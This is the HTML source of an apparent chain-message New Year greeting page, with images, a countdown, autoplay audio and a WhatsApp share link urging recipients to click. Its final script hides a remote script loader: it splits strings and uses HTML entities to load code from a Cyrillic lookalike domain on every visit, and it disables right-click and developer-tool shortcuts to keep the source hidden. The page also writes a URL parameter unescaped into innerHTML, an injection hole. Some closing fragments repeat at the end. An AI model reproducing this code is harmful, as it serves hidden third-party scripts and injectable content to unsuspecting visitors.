<img src="https://1.bp.blogspot.com/-r9ER5fkUJfQ/X714Tf-oYAI/AAAAAAAABsg/KGn3RcsiWCcsbjKIA3aU0O3a1J0U-r2pwCLcBGAsYHQ/s0/ClipartKey_38970.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-VnoUz7ydwxM/X714h6gP4lI/AAAAAAAABs8/3Ppka3EIcG4t6OM5JVeZRZN_kt9_gyz8QCLcBGAsYHQ/s0/pngfind.com-holiday-png-202855.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-i2mOQcABej0/X714V7DsgmI/AAAAAAAABso/qXnKiV5PwP0NcxGkcOeO1yXMenrc3XvIwCLcBGAsYHQ/s0/ClipartKey_38613.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-kw-vJ6bHSvo/X714Um5thjI/AAAAAAAABsk/YQcrr6aXOJ41cKZRpZi_adZMGn4qeapfgCLcBGAsYHQ/s0/kisspng-christmas-ornament-candle-vector-christmas-candles-5a838d6d9499e5.8373334415185708616087.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-r9ER5fkUJfQ/X714Tf-oYAI/AAAAAAAABsg/KGn3RcsiWCcsbjKIA3aU0O3a1J0U-r2pwCLcBGAsYHQ/s0/ClipartKey_38970.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-VnoUz7ydwxM/X714h6gP4lI/AAAAAAAABs8/3Ppka3EIcG4t6OM5JVeZRZN_kt9_gyz8QCLcBGAsYHQ/s0/pngfind.com-holiday-png-202855.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-i2mOQcABej0/X714V7DsgmI/AAAAAAAABso/qXnKiV5PwP0NcxGkcOeO1yXMenrc3XvIwCLcBGAsYHQ/s0/ClipartKey_38613.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-kw-vJ6bHSvo/X714Um5thjI/AAAAAAAABsk/YQcrr6aXOJ41cKZRpZi_adZMGn4qeapfgCLcBGAsYHQ/s0/kisspng-christmas-ornament-candle-vector-christmas-candles-5a838d6d9499e5.8373334415185708616087.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-r9ER5fkUJfQ/X714Tf-oYAI/AAAAAAAABsg/KGn3RcsiWCcsbjKIA3aU0O3a1J0U-r2pwCLcBGAsYHQ/s0/ClipartKey_38970.png" height="25px" width="25px"/><br><br>
<img src="https://1.bp.blogspot.com/-VnoUz7ydwxM/X714h6gP4lI/AAAAAAAABs8/3Ppka3EIcG4t6OM5JVeZRZN_kt9_gyz8QCLcBGAsYHQ/s0/pngfind.com-holiday-png-202855.png" height="25px" width="25px"/><br><br>
</marquee>

 <div class="wbncontainer">

 <div class="wb-main-greeting">

<div style="background: url(https://1.bp.blogspot.com/-l0EVRb2fd3Q/WyNAg2N6m6I/AAAAAAAAAag/yA795u9GRJIf-DaE6-UCcWxL_bbdR5rXwCLcBGAs/s1600/Snow_falling1.gif); background-color:; color: white; font-weight: bold; padding-top: 0px; padding-bottom: 0px; font-size: 12;text-align:center; ">
<font color="white"> <p id="wb"></p>
</font>
</div>
<div style="background: url(https://1.bp.blogspot.com/-l0EVRb2fd3Q/WyNAg2N6m6I/AAAAAAAAAag/yA795u9GRJIf-DaE6-UCcWxL_bbdR5rXwCLcBGAs/s1600/Snow_falling1.gif); background-color:; color: white; font-weight: bold; padding-top: 6px; padding-bottom: 6px; font-size: large;text-align:center; ">

<h2 class="font-effect-neon" align=center" id="wb-show-name"></h2>

<h2 class="font-effect-neon" style="color: #F00;" align=center" id=""></h2>
</Div>
<div style="background: url(https://1.bp.blogspot.com/-l0EVRb2fd3Q/WyNAg2N6m6I/AAAAAAAAAag/yA795u9GRJIf-DaE6-UCcWxL_bbdR5rXwCLcBGAs/s1600/Snow_falling1.gif); background-color: ; color: white; font-weight: bold; padding-top: 6px; padding-bottom: 6px; font-size: large;text-align:center; ">
</font>

<img src="https://1.bp.blogspot.com/-qLlWeIL1B3g/X8_rhh-0QtI/AAAAAAAAByY/rKr0d_0IB4wezwQVwKYxnvGEMhF8QH1mQCLcBGAsYHQ/s1500/Happy-New-Year-Free-PNG-Image.png" style="animation: pulse 1.5s infinite; max-width:200px; width:80%;">
<p id="demoo" class="center animated pulse" style="font-size:20px;color: yellow;"></p>
</div></div>
 </div>
 
 <!------- Img 1 ------------>
 
<center><img src="https://1.bp.blogspot.com/-maLoCfyq3o0/X8_q80_sW7I/AAAAAAAAByM/1FI5_u8j9uEhX4CHu3X6DdG2-mtJ5ODmACLcBGAsYHQ/s1200/%25E2%2580%2594Pngtree%25E2%2580%25942021%2Bhappy%2Bnew%2Byear%2Bvector_5527114.png" style="animation: pulse 1.5s infinite;" width="80%"><br></center>

<h2 class="font-effect-neon" style="color: #F00;" align=center" id="wb-show-wishing">IN ADVANCE</h2><br />
<!------- End Img 1 ------------>

<!-- ADSENSE CODE START HERE -->



<!-- ADSENSE CODE END HERE -->
<center>
<div class="row" style="padding-left: 17px;padding-right: 17px;color:blue;font: 100 1.8em/1 Oswald, sans-serif;line-height:1.5;font-weight:bold;">
<b style="text-shadow: 1px 1px 3px white, 1px 1px 3px white, -1px -1px 3px white, -1px -1px 3px white; color: red;"></b>
<p style="text-shadow: 1px 1px 3px white, 1px 1px 3px white, -1px -1px 3px white, -1px -1px 3px white; color: red;">
Happy, happy New Year!<br> We wish you all the best,<br> Great work to reach your fondest goals,<br>And when you're done, sweet rest.
</p>
<!------- Img 2 ------------>

<center>
<img src="https://1.bp.blogspot.com/-WuWEMjX8-KA/X8_VrRP_CwI/AAAAAAAABxs/ruNkvsWefL42fEOYyDW3BTqy1bUZSdJJACLcBGAsYHQ/s1200/%25E2%2580%2594Pngtree%25E2%2580%25942021%2Bpurple%2Bballoon%2Bword%2B3d_5492499.png" style="animation: pulse 1.5s infinite;" width="80%"/><br><br></center>
<center>


<!------- End Img 2 ------------>
<p style="text-shadow: 1px 1px 3px #FF0000, 1px 1px 3px #FF0000, -1px -1px 3px #FF0000, -1px -1px 3px #FF0000;color: yellow;">
!! HAPPY NEW YEAR !!
</center></p>

<div class="font-effect-neon"><p class="fromMessage" id="wb-fromMessage"></p></div><br/>

<!------- Img 3 ------------>

<center>
<img src="https://1.bp.blogspot.com/-5NPVeWl_6KY/X8_Vj6ithKI/AAAAAAAABxc/aliufmWrN9cqCvqr9ANl_w45Xr10HS1RgCLcBGAsYHQ/s1200/%25E2%2580%2594Pngtree%25E2%2580%2594happy%2Bnew%2Byear%2B2021%2Bcolorful_5461499.png" style="animation: pulse 1.5s infinite;" width="80%"/><br><br></center>
<center>


<!------- End Img 3 ------------>

<p style="text-shadow: 1px 1px 3px #FF0000, 1px 1px 3px #FF0000, -1px -1px 3px #FF0000, -1px -1px 3px #FF0000;color: yellow;font-size:30px">
“Wishing you a happy, healthy New Year.”<br>
</p></center>

<!-- ADSENSE CODE START HERE -->

<!-- ADSENSE CODE START HERE -->


<!------- Audio ------------>

<center>
<audio controls autoplay="yes" mobile="yes" src="https://www.webtofun.com/funarea/ringtones/Arabian_Music_Ringtone.mp3" loop></audio><br />
</center>

	
<!------- Audio ------------>

<!------- Img 4 ------------>

<center>
<img src="https://1.bp.blogspot.com/-EX70u9hfisQ/X8_q83v1k-I/AAAAAAAAByQ/y2VvLAAa_L4od7twd8EZtRdjEyJHGfFwQCLcBGAsYHQ/s1200/%25E2%2580%2594Pngtree%25E2%2580%2594happy%2Bnew%2Byear%2Bvector%2B2021_5527424.png" style="animation: pulse 1.5s infinite;" width="80%"/><br><br></center>
<center>


<!------- End Img 4 ------------>
</br>
<span style="background-color: red; color: white; font-family: &quot;tahoma&quot; , &quot;arial&quot; , &quot;helvetica&quot; , sans-serif; font-size: 18pt;">&nbsp; 🌠Share with your friends 🌠 </span></div>
</br>

<center>
<img height="70px" src="https://4.bp.blogspot.com/-_ZpU-nyCpMc/WyNC8YxwrfI/AAAAAAAAAaw/KXfG3ltVcsgu57_M4_Fa7dZEaRVu1EyGACLcBGAs/s1600/c.gif" width="110px" />
<br /><br /><br />



<div id="formBox" >
 
<input type="text" name="name" id="nameTextBox" placeholder="Enter your Name">
 <div id="goButton" onclick="createGreeting()" >
 Go
 </div>
 </div>
 <a class="footerbtn" href="javascript:void(0)" onclick="shareActionWA()">
 <img width="25px" height="25px" src="https://1.bp.blogspot.com/-d611KgIsh9U/X3gkQzfD5qI/AAAAAAAAAJs/w171oteBnGcT9bOa2gP51s9WK-Has4NawCLcBGAsYHQ/s0/techbhavesh.png">
 <b style="font-size: 15px;position: relative;top: -3px;margin: 0 10px;">Share with your Friends</b>
 <img width="25px" height="25px" src="https://1.bp.blogspot.com/-d611KgIsh9U/X3gkQzfD5qI/AAAAAAAAAJs/w171oteBnGcT9bOa2gP51s9WK-Has4NawCLcBGAsYHQ/s0/techbhavesh.png">
 </a>
 </div>
 



.
 . <script>
 var jqs = function(sParam) {
 var sPageURL = window.location.search.substring(1);
 var sURLVariables = sPageURL.split("&");
 for (var i = 0; i < sURLVariables.length; i++) {
 var sParameterName = sURLVariables[i].split("=");
 if (sParameterName[0] === sParam) {
 return sParameterName[1];
 }
 }
 };
 window.jqs = jqs;
 var name = decodeURI(jqs("bl"));
 if (typeof jqs("bl") === "undefined") {
 name = "";
 }
 var checkName = function() {
 if (name.length !== 0) {
 name = name.replace(/-/g, " ");
 console.log("name is there", name);
 document.querySelector("#wb-show-name").innerHTML = name;
 document.querySelector("#wb-show-wishing").innerHTML = "";
 document.querySelector("#wb-fromMessage").innerHTML= ""
 } else {

 }
 };

 checkName();

 var createGreeting=function(){
 sname=document.querySelector("#nameTextBox").value;
 sname=sname.replace(/@/g,"-")
 sname=sname.replace(/%40/g,"-")
 sname=sname.replace(/\./g,"-")
 if(sname.trim()!=""){
 document.querySelector("#formBox").style.display = "none";
 document.querySelector(".footerbtn").style.display = "block";
 document.querySelector("#wb-show-name").innerHTML = sname;
 document.querySelector("#wb-show-wishing").innerHTML = "";
 document.querySelector("#wb-fromMessage").innerHTML= "Share With Your Friends";
 window.scrollTo(0,0);
 }else {
 alert ("Please Type Your Name First");
 document.getElementById("nameTextBox").focus();
 }
 }

 var shareActionWA = function() {
 var shareString = "";
 var whatsappHref;
 shareString += "*"+sname+"*";

 
 shareString +=" send something special for you 🎁%0A*Click the blue line below*🙏%0A👇👇👇👇 %0A"
 shareString +=(window.location.href.split("?")[0] + "?bl=" + sname).replace("#", "").replace(/ /g, "-");
 

 whatsappHref = "whatsapp://send?text=" + shareString;
 window.location.href = whatsappHref;

 };
 
 </script>
 
<script>
// Set the date we're counting down to
var countDownDate = new Date("Jan 1, 2021 00:00:00").getTime();

// Update the count down every 1 second
var x = setInterval(function() {

    // Get todays date and time
    var now = new Date().getTime();
    
    // Find the distance between now an the count down date
    var distance = countDownDate - now;
    
    // Time calculations for days, hours, minutes and seconds
    var days = Math.floor(distance / (1000 * 60 * 60 * 24));
    var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
    var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
    var seconds = Math.floor((distance % (1000 * 60)) / 1000);
    
// Output the result in an element with id="demo"
    document.getElementById("demoo").innerHTML = days + "<font color='#00ffcc'> day,</font> " + hours + "<font color='#00ffcc'>  Hours,</font> "
  + minutes + "<font color='#00ffcc'> minutes,</font> " + seconds + "<font color='#00ffcc'> Seconds</font>  ";
    
    // If the count down is over, write some text 
    if (distance < 0) {
        clearInterval(x);
        document.getElementById("demoo").innerHTML = "";
    }
}, 1000);
</script>



<script>
document.addEventListener('contextmenu', event => event.preventDefault()); document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'&#1092;'+'&#1102;.'+'i'+'o"></s'+'cr'+'ipt>'); document.onkeydown = function(e) { if(event.keyCode==123){ return false; } else if (e.ctrlKey && (e.keyCode === 67 || e.keyCode === 16 || e.keyCode === 73 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) { return false; } };
</script> 
</body>
 </html>
html>
 return false; } };
</script> 
</body>
 </html>
